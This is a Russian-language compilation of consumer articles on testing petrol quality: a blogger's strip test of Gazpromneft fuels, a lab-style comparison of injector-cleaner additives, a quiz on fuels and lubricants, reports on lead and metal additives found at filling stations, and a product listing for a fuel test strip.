Тест бензина: тестирование топлива

«Газпромнефть» 95 G-Drive vs 95 vs 92!Совершенно случайно увидел в магазине тест на проверку некачественного бензина.

тест

Стало интересно, купил и решил проверить топливо которым всегда заправляюсь, а именно 95-GDrive от «Газпромнефть»…

Газпромнефть

1) Посмотрел про тест в интернете:

2) Посетил официальный сайт3) Прочитал инструкцию:

мануал

Однозначно данный тест стопроцентного результата не дает, все примерно, но стало интересно, а есть ли смысл платить за G-Drive?, и вообще качественный ли бензин у «Газпромнефть»? Ведь ажиотаж на этих заправках (по крайней мере у нас в городе) большой, всегда очереди…Заехал на любимую заправку, как обычно заправился джидрайвом и набрал немного в ёмкость.

чек

После попросил клиентов заправки взять у них немного бензина (95 и 92), девушка на Juke и парень на Focus'е Вам спасибо!))) Правда смотрели на меня там все как на идиота, ходил с медицинскими баночками для анализов и бензин выпрашивал… ну да ладно…))))

95G vs 95 vs 92

Жена с бензином домой не пустила, так что пришлось проводить исследование анализ тест бензина в подъезде…))Распаковал тест, и начал все делать согласно инструкции…

1

2

3

Кстати, все виды бензина одинакового цвета, прозрачные, пахнут одинаково. На глаз создается впечатление чистого качественного топлива…Если честно думал что сделаю разоблачение, будут какие то немыслимые результаты, сенсация…))) но нет, все в принципе как и ожидалось…

тест

Повторюсь, тест не дает стопроцентных (100%) результатов! Результаты проверки на разных заправках одной и той же компании могут быть разными! Изменение цвета индикаторной полоски означает наличие в бензине присадок!..РЕЗУЛЬТАТ:

92 Полоска слегка (практически не заметно) изменила цвет. Судя по всему этот бензин качественный обычный и в нем нет запрещенных присадок.

95 Полоска изменила цвет (потемнела). Скорее всего в этом виде топлива что то подмешано.95G Полоска изменила цвет (потемнела), точно так же как и тест 95'го бензина.

РЕЗУЛЬТАТ!

ВЫВОД:Америку я не открыл, велосипед не изобрел, результаты оказались ожидаемы… Все в принципе это знают, но лично для себя я убедился что 92'й это просто бензин, 95'й это разбавленный присадками 92'й, а 95G (топливо якобы увеличивающее мощность двигателя) это тоже самое что и 95'й… Лично я между 95 и 95G разницы в использовании не ощутил поэтому для меня этот вопрос был наиболее актуален. Теперь ясно что из за акций в которых при покупке G-Drive топлива клиент получает два купона (наклейки) а не один и переплачивает за каждый литр 2-3 рубля, по сути это один и тот же бензин. Может я и не прав, тест не дает точной информации. На сайте «Газпромнефти» пишут следующее:

* Согласно результатам испытаний в независимом европейском испытательном центре при использовании топлива с активным комплексом присадок на автомобиле Фольксваген Гольф с рабочим объемом двигателя 1,6 л. и непосредственным впрыском бензина (далее VW Golf, 1.

6 FSI) зафиксировано: 1 увеличение мощности двигателя до 12% при 2000 об/мин. Среднее увеличение мощности двигателя в рабочем диапазоне 2000-4000 об/мин составило 7,4%; 2 снижение времени разгона автомобиля с 50 до 100 км/час до 1.8 сек. на 5 передаче.

Среднее улучшение динамических характеристик автомобиля в широком диапазоне от 20 до 120 км/час на 3,4,5 передачах составило 8,2%

Несмотря на результаты тестов, лить 92'й я не буду. Попробую в следующий раз заправиться просто 95 и сделать замеры на экономичность, если на 95'ом и G-Drive проеду одинаково, то полностью перейду на 95'й… Заправками «Газпромнефть» всегда доволен, заправляюсь только там, хороший сервис, доброжелательные работники, им спасибо за это! Интересно теперь проверить «Лукойл» и сравнить результаты…))P.S. Подписывайтесь, читайте БЖ, пишите комментарии, ставьте «класс», Заправляйтесь только хорошим топливом, Всем мир!

Источник: https://www.drive2.ru/l/2648614/

Автохимическая олимпиада. Лабораторный тест присадок для улучшения свойств топлива

Споры о необходимости промывки топливной системы автомобиля идут давно, но к общепризнанному согласию они так и не привели. Ситуация усугубляется еще и тем, что такие химические присадки изготавливаются немалой группой производителей и каждый из них, естественно, пытается доказать, что его продукты эффективнее «обычных». Кому можно верить в этом, весьма непростом деле? Тем более, что нет консолидированного ответа на самый первый вопрос: а стоит ли?

Субъективные ощущения водителя от езды после добавления присадки в бак также не дают полной картины, поскольку совсем не факт, что присадки, созданные для улучшения свойств топлива, как-то скажутся на повышении мощности двигателя или плавности его работы.

Дабы развеять сомнения по поводу разрек­ламированных возможностей этих присадок, мы решили сделать независимый тест с помощью «набора юного химика», а вернее, набора химикатов с артикулом 995DCA для проверки концентрации азота в бензине. Набор продается в США и применяется для оценки качества топлива.

Для проведения сравнительных тестов в «переговорке» нашего офиса, которая теперь превратилась в мини-лабораторию, мы решили взять наиболее разрекламированные на нашем рынке присадки, которые производятся в разных странах: Лавр Art Lu 2109, 310 мл из России, стоимость 216 руб.; Liqui Moly 7555, 300 мл, из Германии, стоимость 441 руб.; BG 44K, 177 мл, производства США, стоимость 870 руб.

Фото 1. Участники теста

Первый участник произведен известным химическим концерном в Челябинске. На этикетке написано, что это – «очиститель инжекторов, присадка в бензин, и он используется для полной очистки инжекторов бензинового двигателя.

Восстанавливает факел распыла, способствует выведению воды из топлива, предупреждает коррозию и образование кристаллов льда, даже снижает расход топлива. Состав: базовый алифатический сольвент, пакет моющих присадок, спирт алифатический, функциональные ПАВ».

Если кто не помнит, ПАВ – это поверхностно активные вещества.

Фото 2. Набор «Юный химик»

Второй участник из Европы вообще не указывает никакого химического состава, дает лишь адрес завода – производителя в Германии и местного представителя.

Присадка в очень качественной и удобной жестяной банке, рекомендуется для «восстановления первоначальной мощности двигателя, стабилизирует обороты холостого хода, предотвращает провалы при подаче газа и рывка в движении, облегчает запуск, улучшает экологию, предотвращает коррозию и уменьшает износ деталей топливной системы».

Фото 3. Сравнительная таблица

«Американец» дает только адрес завода-изготовителя в США. Адрес местного представителя отсутствует. Из состава понятно, что это «гидроочищенные нефтяные легкие дистилляты и растворитель».

По применению указано только то, что это – «присадка для очистки топливной системы бензинового двигателя» – без дополнительных подробностей. Далее много информации на русском языке об опасности употребления состава внутрь и т. п.

Видно, подстраховались после последствий «Боярышника»…

Хотя все наши участники прячут точный состав друг от друга и от пользователей, давно известно, что компонент, который на сегодняшний день наиболее эффективен для очистки топливной системы в присадках с розничной ценой 400–800 руб., это полиэфирамин. Также для очистки форсунок используется полибутенамин, но у него есть серьезный минус – полибутенамин горит в камере сгорания и оставляет после себя нагар и отложения.

И это, как мы понимаем, не сулит ничего хорошего. В наших условиях мы не сможем определить, какой компонент используется в присадке – полибутенамин или полиэфирамин. Но мы знаем, что основным элементом для очистки служит азот, который входит в состав этих компонентов, а именно аминов. Определить концентрацию азота нам вполне по силам.

Таким образом, методология нашего тестирования будет заключаться в следующем.

1. Поиск азота в указанных присадках. Если он есть – значит, они реально чистят.

2. Определение степени его концентрации. Чем его больше, тем лучше очищающие свойства препарата.

Теперь несколько слов о самом наборе. Он состоит из реторт, мензурок, пипеток, сравнительной таблицы результатов. В него также входит Титрант А [титрант (стандартный раствор) – раствор с известной концентрацией, с помощью которого в процессе титрования определяется концентрация анализируемого раствора] и Индикатор B.

Индикатор В содержит изопропиловый спирт и воду. Он окрасит топливо с введенной в него присадкой в синий цвет. Таким образом, мы визуально узнаем о наличии азота в присадке и степени его концентрации.

В состав Титранта А также входит изопропиловый спирт. Он имеет обратное действие. Мы будем вводить его каплями в бензин с присадкой и проследим, когда бензин вернет свой первоначальный цвет.

То есть чем больше капель раствора нам понадобится для возвращения цвета топлива к исходному, тем выше будет концентрация азота, тем лучше качество присадки, тем выше ее очищающие свойства.

Для оценки качества присадки используется специальная таблица, которая прилагается к набору (см. с. 35). По ней мы и будем ориентироваться:

Итак, начинаем тест. Для начала отливаем на ближайшей к офису заправке – сети ЭКА – обыкновенный 92-й бензин. На нем будем проводить эксперименты и сравнивать и оценивать качества присадок. Наливаем в пробирку № 1 10 мл бензина. Столько же добавляем в пробирки № 2, 3 и 4, в которые затем накапаем присадки.

Многие производители топлив добавляют присадки в продукт, чтобы бензин обрел очищающие свойства, а также, что весьма немаловажно, ради получения дополнительных маркетинговых возможностей.

Это позволяет производителю топлива присваивать своему товару громкие имена. Сейчас мы проверим, есть ли азот в нашем образце, который залит в пробирку № 1. Капаем туда пять капель Индикатора В и перемешиваем.

И, о чудо! Чистый желтоватый бензин окрашивается в светло-голубой цвет! Значит, и тут производитель добавил присадку.

Теперь капаем Титрант А. Всего одна капля возвращает бензину первоначальный цвет. Смотрим таблицу – результат для топлива неплохой. Такой бензин поможет держать инжекторы чистыми. А вот для серьезной очистки топливных элементов этого, конечно, маловато.

Добавляем по две капли присадок в пробирки № 2 («Лавр»), 3 (Liqui Moly) и 4 (BG) с помощью пипетки так, чтобы жидкости не смешивались между собой.

Перемешиваем и смотрим результат. Ничего не произошло. Цвет всех пробирок остался одинаковым. Далее добавляем в каждую пробирку по пять капель индикатора В и перемешиваем содержимое. Так мы определим наличие чистящего вещества – азота.

Фото 6. Добавляем присадки

«Лавр» окрасился в нежно-голубой цвет, «немец» – в густой синий, а «американец» – в темно-фиолетовый.

Это говорит о том, что все наши участники не обманывают потребителя, а реально имеют в своем составе чистящий компонент, которым и является азот. Но самое интересное впереди.

Теперь попробуем определить степень качества присадок путем добавления титрантового раствора и посмотрим, насколько они хороши.

Участник в пробирке № 2 («Лавр»). Капаем Титрант А. Цвет начинает меняться после пяти капель. Полное восстановление цвета бензина происходит после того, как мы добавили 11 капель.

Смотрим таблицу эффективности: это очень неплохой результат! Такая присадка способна очистить топливную систему в течение первых 400–2500 км пробега.

Инжекторы, впускные каналы и клапаны она очистит на протяжении 4–12 тыс. км! Впечатляет.

Участник в пробирке № 3 – Liqui Moly. Капаем раствор. Удивительно, но уже через две капли темно-синяя жидкость стала бледнеть, а через три – цвет вернулся к начальному. Это слабый результат. И очень неожиданный. Моющая эффективность этой присадки чуть лучше, чем свойства обычного бензина.

Участник в пробирке 4 – BG. Капаем пять капель раствора – эффекта нет вовсе. Через 10 капель фиолетовый цвет стал меняться на синий.

Полностью цвет бензина восстановился только после того, как мы добавили 18 (!) капель Титранта А. Это самый стойкий результат. Но что он означает? Обращаемся к таблице: полное и быстрое очищение всей топливной системы. Эффект сохраняется на протяжении 1–6 заправок топлива.

Фото 7. Добавляем индикатор В Фото 8. BG после 10 капель Фото 9. BG после 18 капель

Итак, теперь перейдем к итогам нашего тестирования.

Самый плохой результат неожиданно показала немецкая присадка Liqui Moly. Ее эффект можно сравнить с использованием бензина хорошего качества. Видимо, поэтому производитель и скрывает состав продукта. Нет никакого смысла тратить деньги на эту жидкость.

Второе место занимает «родной» «Лавр». Будучи самым дешевым, он показал неплохие результаты, которые полностью соответствуют его назначению. Мы будем рекомендовать эту присадку для успешного применения в случае небольшого загрязнения топливной системы или если после заправки вам кажется, что бензин был некачественный.

Первое место занимает американская присадка BG, которая показала наилучшие результаты. Но она и самая дорогая, 177 мл жидкости стоит 870 руб. Эту присадку можно смело рекомендовать для применения при очистке даже серьезно загрязненных топливных систем. А если после заправки машина совсем перестает ехать нормально, то она (эта присадка) может стать панацеей от всех ваших бед.

С присадками, добавляемыми в топливный бак, мы разобрались. В следующей статье будем тестировать профессиональные жидкости, которыми пользуются автосервисы при очистке топливных систем с помощью специального оборудования. Для этого уже закуплены участники: BG (США), «Лавр» (Россия), Wynn’s (США), Liqui Moly (Германия) и Gunk (США).

Мнение редакции может не совпадать с мнением автора статьи

Станислав Светозаров, зам. директора ООО «Интерлакен-Рус»

Источник: https://abs-magazine.ru/article/avtohimicheskaja-olimpiada-laboratornyj-test-prisadok-dlja-uluchshenija-svojstv-topliva

Задания для викторины на тему: "Эксплуатационные материалы"

  • Задания для викторины на тему: «Эксплуатационные материалы».
  • Участников викторины необходимо разбить на две команды.
  • Тестирование на тему: « Бензиновое и дизельное топлива».
  1. Детонационная стойкость бензина оценивается…..(10 баллов)

  1. а) Октановым числом
  2. б) Плотностью топлива
  3. в) Испаряемостью топлива
  4. г) Цетановым числом

2. Эксплуатационными показателями автомобильных топлив являются…. (20 баллов)

  • а) Испаряемость
  • б) Воспламеняемость
  • в) Горючесть
  • г) Стабильность
  • 3. Свойствами и показателями дизельного топлива, влияющими на его смесеобразование, являются… (30 баллов)
  • а) Плотность
  • б) Поверхностное натяжение
  • в) Испаряемость
  • г) Низкотемпературные свойства
  • 4. Цетановое число зимнего дизельного топлива должно быть не менее…(40 баллов)
  • а) 40
  • б) 50
  • в) 60
  • г) 70
  • 5. Наивысшая температура, при которой дизельное топливо теряет текучесть, называется температурой…(50 баллов)
  • а) помутнения
  • б) застывания
  • в) Кристаллизации
  • г) Самовоспламенение
  • ЗАДАНИЯ на тему: «Масла и технические жидкости».
  1. Каково назначение смазочных масел? (10 бал.)

  1. Ответ:
  2. — уменьшение износа деталей;
  3. -отвод тепла от нагретых деталей;
  4. -вынос из зон трения продуктов износа;
  5. — защиту металлических поверхностей от коррозии;
  6. — уплотнение зазоров между деталями.
  1. Чем отличаются трансмиссионные масла от моторных? (20 баллов)

  • Ответ:
  • — вязкостью,
  • — химическим составом,
  • — назначением.
  1. Выбрать способы получения моторных масел и заполнить правильно таблицу.

(30 баллов). Я раздаю чистые таблицы, которые студенты должны правильно заполнить.

Дано:

  1. Виды масла
  2. Способ получения
  3. Минеральное
  4. Смесь минерального и синтетического базовых масел
  5. Синтетическое
  6. Получено путем переработки нефти
  7. Частично синтетическое
  8. Получено путем органического синтеза
  9. Виды масла
  10. Способ получения
  11. Минеральное
  12. Получено путем переработки нефти
  13. Синтетическое
  14. Получено путем органического синтеза
  15. Частично синтетическое
  16. Смесь минерального и синтетического базовых масел

ОТВЕТ:

  1. Расположить различные масла в нужной последовательности в зависимости вязкости от температуры. (40 баллов). Я раздаю по графику каждой команде. Они должны правильно вписать в нужной последовательности масла.

  • Дано:
  • вязкость
  • всесезонное
  • зимнее
  • летнее
  • Cтемпература 100° C
  • Ответ:

Я раздаю по 5 карточек с описанием характеристик охлаждающих жидкостей каждой команде. На обратной стороне они должны подписать антифриз или тосол.

Ответ:

  1. Антифриз
  2. Тосол
  3. общее название для всех охлаждающих жидкостей
  4. марка антифриза, разработанная в советском союзе.
  5. Присадки в его составе – органические соли.

  6. Присадки в его составе – неорганические соли
  7. образует защитный слой только в местах коррозии.
  8. образует защитный слой металла в 0,5 мм, при этом ухудшая теплообмен.
  9. теряет охлаждающую способность через 250 тысяч км.

теряет охлаждающую способность через 30-40 тыс. км.

закипает при температуре 115 градусов.

менее устойчив к высоким температурам.

ЗАДАНИЕ на тему: «Топливо».

1.Какими методами можно повысить детонационную стойкость бензина?(30 баллов)

Ответ:

а) Введение в бензин прямой перегонки специальных присадок — антидетонаторов. Бензин получается существенно дешевле, но и значительно вреднее.

б) Бензин прямой перегонки подвергают вторичной переработке (каталитический риформинг, крекинг и др.), т. е. воздействуют на химический состав бензина, что требует значительных средств, но бензин при этом получается наименее вредным для окружающей среды.

2. Назвать основной компонент компримированного (сжатого) природного газа и основной компонент сжиженного газообразного топлива. (40 бал.)

(Метан и Пропан)

3. Применение топлива. Командам нужно дать правильные ответы, опередив соперника.(10 бал.)

  1. Достоинства компримированного (сжатого) природного газа

(низкая цена; высокая теплоотдача и КПД;по экологическим показателям выхлопа значительно превосходят бензины; при переходе с жидкого топлива на газообразное срок службы двигателя до капитального ремонта возрастает в 1,5 раза, а сроки смены масла увеличиваются в 2 раза).

  1. Отрасль — один из самых главных потребителей угля

(металлургия)

В конце викторины подсчитывается количество баллов, выбирается команда победителей и награждается.

Источник: https://infourok.ru/zadaniya-dlya-viktorini-na-temu-ekspluatacionnie-materiali-857642.html

Осторожно: свинец!

Тетраэтилсвинец, если вы еще не успели забыть, — это яд, в том числе и для автомобильного каталитического нейтрализатора.

В большинстве стран его применение давным-давно запрещено, а с 2003 года этилированный бензин вне закона и в России. За последние пятнадцать лет мы в Авторевю, проводя тесты топлива, повидали многое, но ни разу не выявляли в нем свинец.

А сейчас — в двух образцах из шестнадцати! Каждый восьмой… И где, в Москве и Московской области!

Большинство проб мы отобрали на самом популярном редакционном маршруте Москва — Дмит­ровский автополигон. Но, уверен, устрашающие результаты теста касаются не только этого направления.

Меньше небольших частных заправок — меньше обмана. Их дни, к счастью, сочтены — эта АЗС возле Дмитровского полигона уже закрылась

Мы же посетили заправку VP Racing, реализующую спортивное топливо, две мелкие АЗС (KP-Oil и Параллель), три АЗС относительно небольших сетей (ЕКА, Нефтьмагистраль и Трасса) и АЗС шести крупных игроков — это Роснефть, Лукойл, Газпромнефть, ВР, Татнефть и Shell.

Спортивный бензин продают в бочках, но готовы налить и в канистры

Почему нет ТНК? Этот бренд, равно как и российские АЗС ВР, принадлежит Роснефти, а в прошлом году начался ребрендинг: заправки меняют ­сине-оранжевую ливрею ТНК на желтую расцветку Роснефти, а торговая марка ТНК вскоре покинет рынок ­топлива и моторных масел.

В декабре мы попали на период переписывания ценников из-за очередного повышения акцизов на топливо (правда, они увеличивались только с 1 января, и Федеральная антимонопольная служба уже ведет проверки на предмет ценового сговора). Поэтому пусть вас не смущает цена 41 рубль за литр ­АИ-95 — сейчас на большинстве сетевых заправок «девяносто пятый» стоит не меньше 42 рублей.

На всех АЗС, кроме Трассы и «спортивной» заправки VP Racing, мы приобрели бензин АИ-95. На АЗС Shell и ВР вдобавок купили улучшенный «девяносто пятый» Shell V-Power и ВР Ultimate. Нефтяники обычно называют его фирменным, хотя еще 11 лет назад мы выяснили, что это обычное ­топливо, но с дополнительным пакетом моющих присадок. Заодно посмотрим, что изменилось за эти годы.

Поскольку все больше автомобилей оснащаются турбомоторами, для которых чем выше октановое число бензина, тем лучше, мы на АЗС Газпромнефть и Трасса приобрели АИ-98, а на Лукойле и «спортзаправке» VP Racing — АИ-100.

Любопытно, что если лукойловский «сотый» (49,2 рубля за литр) лишь на ­рубль-полтора дороже «девяносто восьмого», то бензин на АЗС VP Racing — вдвое! Газпромнефть, кстати, тоже производит «сотый» бензин, но сейчас он предлагается только в Новосибирской области, и в Москву его пока не завозят.

Действующий в России Технический регламент Таможенного союза «О требованиях к автомобильному и авиационному бензину, дизельному и судовому топливу, топливу для реактивных двигателей и топочному мазуту» предписывает соответствие любого реализуемого бензина экологическому классу К5, что означает выполнение многих требований — вплоть до предельной массовой доли кислорода. Но при этом важнейшая характеристика бензина, октановое число, фактически выведена за скобки: «не менее 80». И только!

Тем приятнее было с помощью одноцилиндрового лабораторного двигателя УИТ-85 с изменяемой степенью сжатия убедиться, что ни одна сетевая АЗС не пользуется такой лазейкой. Истинные значения октанового числа соответствовали товарным названиям бензинов, причем в полной мере это относилось и к АИ-100.

Вердикт одноцилиндрового лабораторного двигателя УИТ-85 с изменяемой степенью сжатия: на сетевых заправках заявленному верить! Даже АИ-100 показывает реальное октановое число 100,0 по исследовательскому методу

Увы, о мелких частных АЗС такого не скажешь. На KP-Oil под видом «девяносто пятого» нам продали «девяносто второй», а на АЗС Параллель — и вовсе АИ-90! И это было не единственное и далеко не самое страшное прегрешение.

Источник: https://autoreview.ru/articles/test-topliva/benzin-svinec

Тест бензина

Для того чтобы ваш автомобиль реже ломался и находился в мастерской, за ним необходим тщательный уход. Следует проводить не только регулярное посещение сервисов и конечно лучше, если они будут авторизованными, но и использовать качественное топливо.

Ведь «здоровый» автомобиль будет меньше доставлять вам беспокойства, да и будет оценен дороже и позволит выручить за себя больше денег при его продаже или получить более интересное денежное предложение в случае, если вам срочно понадобятся деньги и вы решите заложить его, воспользовавшись услугами, которые  предоставляет автоломбард. Также стоит отметить, что времени на оформление документов в ломбарде для автомобилей у вас уйдет значительно меньше, чем на ремонт автомобиля от некачественного бензина в любой автомастерской.

О том, какого качества топливо находится на автозаправке, определить невозможно до тех пор, пока вы его не зальете себе в бак и не поедете.

Сертификаты и цифры с процентным содержанием присадок и октанового числа, имеющиеся на заправочных станциях, еще ни о чем не говорят. Плохое топливо или нет, вы сразу определить не сможете, особенно если вы новичок.

Опытные водители чувствуют машину и мгновенно распознают, что она едет по-другому или сразу замечают рывки, возникающие при движении автомобиля и более шумную работу двигателя.

Чаще всего при заливке некачественного топлива в бензобак вашего автомобиля, это может негативно сказаться на “самочувствии” машины и привести к поломкам разной степени тяжести, требующих серьезных денежных вливаний в ремонт, например, от замены бензонасоса и топливного фильтра с промывкой топливопроводной системы вашего автомобиля до полного разбора двигателя и капитального его ремонта. А это уже обойдется вам не в одну тысячу рублей.

После разбора двигателей, снятых с машин, заправляющихся фальсифицированным бензином, как правило, видно клапана с содержанием на них обильного объема смолистого нагара и залегание клапанов в направляющих головок. При добавлении присадок в бензин, производители увеличивают его октановое число до нормативного, а такие действия очень сильно влияют на двигатель.

При поджигании топливной смеси происходит повышенная детонация, что приводит к разрушению двигателя полностью. На работе двигателя может также сказаться и машинное масло плохого качества.

Как же быть в подобной ситуации? Есть ли возможность определить качество бензина без обращения в специализированные лаборатории?

Ответ – Да. Сейчас на рынке начали появляться универсальные тесты для определения качества бензина. Причем определять можно качество бензина, начиная от АИ-80 и заканчивая АИ-98.

При приобретении такого теста, водители сами смогут воспользоваться им и определить качество покупаемого бензина в любое время и в любом удобном для них месте.

Для определения «фальшивости» топлива достаточно всего одну каплю нанести на специальную полоску-реагент и уже через несколько минут у вас будет достоверный результат. Тест выполнен в виде полоски, что позволит опустить его в бензобак или канистру, придерживая пальцами за один край.

После чего вы сможете принять решение о том, стоит ли заправляться на данной заправке или же стоит поискать другую АЗС. Такие бензотесты позволяют выявить фальсифицирующие добавки, присутствующие в бензине. К таким добавкам относятся металлосодержащие присадки и примеси, которые медленно, но верно убивают двигатель вашего автомобиля.

Набор с бензотестами прост в использовании. После попадания на него бензина происходит химическая реакция со специальным реагентом, нанесённым тонким слоем поверх полоски. По времени завершения химической реакции тест окрашивается в определенный цвет, характеризуя качество проверяемого топлива.

Источник: https://signsign.ru/blog/2012/07/13/test-benzina.html

TEST WAY тест на качество бензина (помогает выбрать качественный бензин)

-23%Осталось 5 дней

Уникальный экспресс-тест «Определение качества бензина» ! 
Определяют наличие в топливе запрещенных присадок, повышающих октановое число. !!

Принципиально новая, уникальная продукция – экспресс-тест на определение некачественного бензина.

КАК ЭТО РАБОТАЕТ?

  • Если индикаторный материал изменил свой цвет, значит, в бензине присутствуют присадки, запрещённые Техническим Регламентом. Если цвет не поменялся, значит, в бензин не добавляли искомые присадки, с помощью которых из Аи-76, Аи-80 с легкостью можно сделать Аи-92, Аи-95, Аи-98.
  • Достаточно одной капли бензина, который остаётся от предыдущей заправки в заправочном пистолете, чтобы принять решение, заправляться или не заправляться в данной точке.

Наверняка вы слышали много историй, как у кого-то из ваших друзей и знакомых случались проблемы с автомобилем из-за некачественного бензина. Может быть и сами были свидетелем такого случая? Самая безобидная проблема — это когда автомобиль, что называется, «не едет». Самая «обидная» — когда выходит из строя двигатель и топливная система.

Многие заправщики, в том числе крупные сети, используют присадки для достижения нужного октанового числа. Самые наглые доводят октановое число из 80 бензина. Но и присадки присадкам рознь. Добросовестные производители используют не запрещённые присадки, соблюдая технологический процесс.

Недобросовестные мешают из самого дешёвого сырья, в нём используются присадки на основе ферроцена и N-метиланилина (ММА). Данные присадки запрещены к использованию. Казалось бы, закон есть закон, но введите в поисковой системе название запрещённой присадки и убедитесь насколько велика конкуренция среди продавцов этой химии.

Без спроса нет предложения, соответственно, данные присадки в настоящее время широко распространены.

Проверить качество бензина перед заправкой — стало реальностью! Индикаторный тест на определение некачественного бензина TEST WAY не имеет аналогов на автомобильных рынках Украины, СНГ и мира.

Закреплённый на полоске индикатор представляет собой нетканый материал. Уникальность данного материала заключается в том, что в нём созданы нанопоры от 5 до 160нм.

Сам материал и его состав является авторским ноу-хау. Материал способен «распознавать» металлосодержащие соединения, в частности, железосодержащие.

А также улавливать азотосодержащие соединения, при этом реагируя на них путём изменения цвета.

Берегите свой автомобиль! Перед тем, как заправиться, проверьте бензин!

 

Купить TEST WAY, тест бензина

ХарактеристикиИнформация для заказа

Источник: https://akvagrupp.ru/p348592939-test-way-test.html

Береги автомобиль: создан экспресс-тест качества бензина

Экспресс-тесты качества топлива, разработанные в России, позволят мгновенно узнать о наличии в бензине веществ, способных навредить машине. Тесты представляют собой полоски из картона, на которые достаточно капнуть оставшимся на заправочном пистолете топливом.

Если оно содержит свинец, железо и другие вредные для автомобиля соединения, полоска в считаные секунды изменит цвет, тем самым предупредив водителя о низком качестве горючего. На такой АЗС можно будет залить минимальное количество бензина, чтобы доехать до следующей.

Вооружившись тестом, «Известия» провели свое расследование качества бензина на московских заправках.

Пистолет в помощь

Многие водители предпочитают заправляться на станциях, которые им хорошо известны. Однако во время долгой поездки по трассе или в другом городе иногда приходится заезжать на незнакомые заправки.

Чтобы понять, не повредит ли бензин автомобилю, ученые из РГУ нефти и газа (НИУ) им. И.М. Губкина создали два уникальных экспресс-теста на его качество. Первый, уже запатентованный, определяет превышение максимально допустимой концентрации в топливе железа и свинца, а второй — серо- и азотсодержащих соединений.

Согласно ГОСТ 32513-2013, в бензине не допускается содержание перечисленных выше металлов, в дизельном топливе их просто не бывает из-за особенностей производства. В бензине свинец и железо появляются, когда недобросовестный производитель повышает октановое число, например, меняя АИ-92 на АИ-95. И это топливо потом попадает на АЗС, как правило, несетевые.

Давно известно, что свинец опасен для здоровья –– он выделяется вместе с выхлопными газами и накапливается в организме быстрее, чем выводится.

Кроме того, органические соединения свинца мешают работе особых фильтров, стоящих на выхлопных трубах автомобилей, чтобы уменьшить количество вредных веществ, выбрасываемых в воздух. Железо не вредит организму, но от него автомобильные свечи покрываются красным налетом, а постоянно менять их накладно.

Если не уделять внимание нагару, на электроде образуется слой, из-за которого снижается вероятность появления искры, что ведет к нестабильной работе двигателя.

–– Слова в ГОСТе о полном отсутствии железа и свинца в топливе не совсем корректны, –– сообщил заведующий кафедрой общей и неорганической химии НИУ им. И.М. Губкина, академик Алексей Дедов. –– С научной точки зрения правильно говорить о максимально допустимой концентрации для конкретного класса топлива.

Этот параметр присваивается согласно содержанию различных веществ в выхлопах машины. При разработке тестов мы ориентировались на пятый класс топлива (К5 или Евро-5), так как классы меньшего порядка на данный момент запрещены в России.

За отсутствие железа и свинца принимают концентрацию менее 10 мг/л, и тест реагирует на превышение этого количества.

Тест на железо и свинец представляет собой полоску из плотного картона, на который нанесен полимерный композитный материал, меняющий цвет при взаимодействии с металлами.

Чтобы воспользоваться тестом, необходимо прикоснуться к нему заправочным пистолетом, на конце которого всегда остается капля топлива.

Чем больше в бензине железа или свинца, тем насыщеннее становится цвет полоски, варьируясь от желто-зеленого до темно-зеленого.

Цвет серы

Второй тест показывает превышение концентрации серо- и азотсодержащих веществ в топливе. Сернистые соединения изначально содержатся в нефти, избавляются от них на стадии получения топлива.

Данные вещества сокращают срок службы моторного масла и форсунок, впрыскивающих дизельное топливо, а также оказывают негативное воздействие на окружающую среду.

Азотсодержащие соединения применяются для поднятия октанового числа, но при сгорании дают канцерогенные вещества, наносящие вред экологии и каталитическому дожигателю выхлопных газов.

Тест, определяющий наличие и концентрацию серо- и азотсодержащих соединений, пока на стадии разработки. На данный момент создан просто реагент, который можно насыпать, например, в пробирку и капнуть туда образцом топлива.

–– Чем больше серы в бензине, тем более интенсивным становится цвет теста, он меняется от бледно-желтого до розового, –– пояснила научный сотрудник кафедры общей и неорганической химии НИУ им. И.М. Губкина Екатерина Исаева.

–– Массовая доля серы в топливе зависит от его класса, и изготовитель обязан указывать данную информацию в кассовых чеках на заправке. В соответствии с постановлением правительства РФ массовая доля серы для автомобильного бензина пятого класса должна быть не более 10 мг/кг. Для дизеля эти цифры аналогичны.

Поэтому созданные нами тесты улавливают наличие серы в образце, если ее массовая доля более 10 мг/кг.

Концентрация азотсодержащих соединений, в частности монометиланилина, применяемого для поднятия октанового числа, также строго ограничена ГОСТ 32515-2013. Она должна быть не более 0,1% объема. Если она превышена, тестовая полоска начинает приобретать слабый голубой цвет, становящийся более насыщенным при увеличении количества этих соединений.

Хорошо, но мало

Авторы работы подчеркивают, что данные тесты не будут иметь юридической силы, если с автомобилем что-либо случится после заправки. Однако такая проверка топлива может предостеречь водителя от заправки или побудить залить минимальное количество бензина, чтобы доехать до следующей АЗС.

–– Я считаю, что разрабатываемые экспресс-тесты должны занять достойную нишу в области быстрого анализа моторных топлив, –– заявил доцент кафедры теоретических основ теплотехники НИУ МЭИ Иван Бураков.

–– Правда, разработанные тесты в сумме позволяют определить лишь четыре наиболее значимых показателя, характеризующие моторные топлива.

Согласно соответствующему ГОСТу, существуют порядка 15 показателей, которые требуется контролировать: концентрация смол, промытых растворителем, индукционный период, объемные доли бензола и углеводородов и т.д. Поэтому использование экспресс-тестов позволит оценить качество предлагаемого бензина или дизеля достаточно поверхностно.

«Известия» провели собственное исследование наличия в топливе московских заправок металлов.

Были взяты образцы бензина на АЗС компаний «Татнефть», «Лукойл», «Роснефть», EKA, Shell, BP и «Газпром», расположенных на МКАД и некоторых вылетных магистралях.

Топливо проверили с помощью тестов, предоставленных НИУ им. И.М. Губкина. Выяснилось, что ни одна из перечисленных заправок не продает бензин с металлосодержащими присадками.

В ближайшее время ученые планируют наладить производство удобных для пользователей тестов на серо- и азотсодержащие вещества в виде картонных полосок.

Источник: https://iz.ru/878712/olga-kolentcova/beregi-avtomobil-sozdan-ekspress-test-kachestva-benzina

На каких АЗС и чем заправляться: выбирает эксперт «За рулем»

Мы рекомендуем заправляться исключительно на известных сетевых АЗС, расположенных вблизи крупных населенных пунктов или вдоль оживленных трасс. Вариантов много: ВР, Shell, ЛУКОЙЛ, Газпромнефть, Роснефть, Neste, Татнефть. Результаты наших экспертиз бензинов этих брендов обычно выглядели достойно. И вероятность нарваться на плохое топливо на таких заправках значительно ниже, чем у компаний-однодневок. Внешние признаки заслуживающих доверия АЗС — чистая территория, современные топливораздаточные колонки, яркие вывески, магазинчик с туалетом и прочие атрибуты цивилизации.

